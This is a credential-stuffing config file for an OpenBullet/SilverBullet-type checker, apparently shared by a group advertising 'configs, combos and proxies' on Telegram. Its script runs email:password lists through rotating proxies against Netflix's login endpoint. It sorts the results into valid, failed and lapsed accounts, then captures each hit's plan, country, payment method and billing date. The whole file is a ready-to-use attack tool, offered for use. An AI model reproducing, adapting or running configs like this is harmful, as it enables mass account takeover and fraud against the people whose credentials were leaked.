[SETTINGS]
{
  "Name": "Netflix Full Capture By Typhon",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2023-09-11T23:08:53.4065811-05:00",
  "AdditionalInfo": "Join My Telegram for more free configs , combos and proxies + MORE!!!! ---- https://t.me/typhonservices@TyphonServices",
  "RequiredPlugins": [],
  "Author": "@TyphonServices",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "Default",
  "DataRules": [],
  "CustomInputs": [
    {
      "Description": "Telegram: https://t.me/typhonservices",
      "VariableName": "",
      "Id": 874731877
    }
  ],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Netflix Full Capture By Typhon",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#CLEAR_COOKIES FUNCTION ClearCookies 

#UA FUNCTION GetRandomUA -> VAR "Typhon" 

#GET REQUEST GET "https://www.netflix.com/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#flwssn PARSE "<COOKIES(flwssn)>" LR "" "" -> VAR "flwssn" 

#authURL PARSE "<SOURCE>" LR "name=\"authURL\" value=\" " "\"" -> VAR "authURL" 

#AUTH FUNCTION URLEncode "<authURL>" -> VAR "AUTH" 

#true FUNCTION Constant "true" -> VAR "t" 

#POST REQUEST POST "https://www.eu-west-1.internal.dradis.netflix.com/account/auth" 
  CONTENT "email=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: <Typhon>" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "Referer: https://www.netflix.com/Login" 

#membershipStatus PARSE "<SOURCE>" LR "membershipStatus\":\"" "\"" CreateEmpty=FALSE -> CAP "membershipStatus" 

#hasDvd PARSE "<SOURCE>" LR "hasDvd\":" "\"" CreateEmpty=FALSE -> CAP "hasDvd" 

#country PARSE "<SOURCE>" LR "country\":\"" "\"" CreateEmpty=FALSE -> CAP "country" 

#KEY KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Incorrect email address or password" 
    KEY "Missing password" 
    KEY "Incorrect email address or password" 
  KEYCHAIN Success OR 
    KEY "CURRENT_MEMBER" 
    KEY "membershipStatu" 
    KEY "SecureNetflixId" 
  KEYCHAIN Custom "FREE" OR 
    KEY "FORMER_MEMBER" 
    KEY "NEVER_MEMBER" 

#GET REQUEST GET "https://www.netflix.com/YourAccount" 
  
  COOKIE "flwssn: <flwssn>" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: www.netflix.com" 
  HEADER "Referer: https://www.netflix.com/browse" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: <Typhon>" 

#PLAN PARSE "<SOURCE>" LR "data-uia=\"plan-label\"><b>" "</b>" CreateEmpty=FALSE -> CAP "Plan" 

#COUNTRY PARSE "<SOURCE>" LR "\",\"currentCountry\":\"" "\"" CreateEmpty=FALSE -> CAP "Country" 

#PAYMENT PARSE "<SOURCE>" LR "paymentMethod\":{\"fieldType\":\"String\",\"value\":\"" "\"}" CreateEmpty=FALSE -> CAP "Payment" 

#Billing PARSE "<SOURCE>" LR "data-uia=\"nextBillingDate-item\">" "<" -> CAP "Billing" 

#https://t.me/typhonservices FUNCTION Constant "@TyphonServices" -> CAP "ConfigBy:" 

